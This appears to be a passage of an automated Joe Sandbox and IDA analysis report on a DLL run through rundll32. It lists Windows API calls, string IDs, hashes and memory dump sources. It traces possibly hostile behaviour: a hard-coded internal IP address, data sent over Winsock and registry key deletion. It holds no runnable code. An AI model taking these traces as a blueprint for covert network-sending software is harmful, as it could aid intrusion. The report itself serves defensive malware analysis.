                                                                                                                                    • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocString$H_prolog3_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 842698744-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                                    • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                                    • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                                    • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                                  • SendMessageA.USER32 ref: 10016A5B
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1877664794-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                                  • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                                  • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                                  • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                                  • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                                  • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 670545878-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                                  • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                                  • GetWindowRect.USER32 ref: 1002059C
                                                                                                                                  • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1315500227-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset
                                                                                                                                  • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                                  • API String ID: 2102423945-4122032997
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                                  • String ID: System
                                                                                                                                  • API String ID: 1529587224-3470857405
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                                  • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                                  • API String ID: 2418878492-2500072749
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                                  • _memset.LIBCMT ref: 1001579D
                                                                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                                  • LoadBitmapA.USER32 ref: 10015807
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4271682439-3916222277
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                                  • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                                  • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2429671754-3916222277
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                                  Similarity
                                                                                                                                  • API ID: System$Metrics$InfoParameters
                                                                                                                                  • String ID: B$DISPLAY
                                                                                                                                  • API String ID: 3136151823-3316187204
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Edit
                                                                                                                                  • API String ID: 0-554135844
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                                  • SendMessageA.USER32 ref: 10023CD9
                                                                                                                                  • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                                  • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                                  • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 187318432-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                                    • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 69039007-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                                    • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                                    • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                                  • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                                  • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$Mode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 696222070-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                                    • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                                    • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                                  • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                                  • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$Mode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 696222070-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                                  • _memset.LIBCMT ref: 10020424
                                                                                                                                  • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                                  • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  Similarity
                                                                                                                                  • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 289641511-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                                    • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                                    • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                                    • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                                    • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                                  • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                                    • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                                  • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                                  • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2731880238-0
                                                                                                                                  • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                                  • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                                  • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                                  • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                                  • SetWindowLongA.USER32 ref: 10012989
                                                                                                                                    • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongMenuWindow$AppendSystem
                                                                                                                                  • String ID: 192.168.3.85$Message
                                                                                                                                  • API String ID: 4121476972-856608562
                                                                                                                                  • Opcode ID: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                                  • Instruction ID: 340d0da2b4c657a0b825359f55c53a9166b08011863532f0c2811cf24d97780a
                                                                                                                                  • Opcode Fuzzy Hash: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                                  • Instruction Fuzzy Hash: F2411B74A4020A9BDB04DB94CCA2FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                                    • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                                    • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                                  • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                                    • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                  • _strcat.LIBCMT ref: 1001310A
                                                                                                                                    • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                                  • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 16450322-3653984579
                                                                                                                                  • Opcode ID: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                                  • Instruction ID: f6b77999ec19404b7b7ce6cfec7bf3295ff1974a42ab232d1976716b8ec2d843
                                                                                                                                  • Opcode Fuzzy Hash: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                                  • Instruction Fuzzy Hash: 01410DB59001189FDB24DB64CC91BEEB775FF44304F5082ADE51AA7282DF346A85CF54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                                    • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                                    • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                                    • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                                    • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                                  • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                  • API String ID: 3274081130-63838506
                                                                                                                                  • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                                  • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                                  • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                                  • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                  • API String ID: 1646373207-3105848591
                                                                                                                                  • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                                  • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                                  • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                                  • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                                  • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                  • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                                  • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                                  • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                                  • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2459298410-0
                                                                                                                                  • Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                                  • Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
                                                                                                                                  • Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                                  • Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 365290523-0
                                                                                                                                  • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                                  • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                                  • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                                  • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Rect$DesktopVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1055025324-0
                                                                                                                                  • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                                  • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                                  • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                                  • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 1002C6E7
                                                                                                                                    • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                                  • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
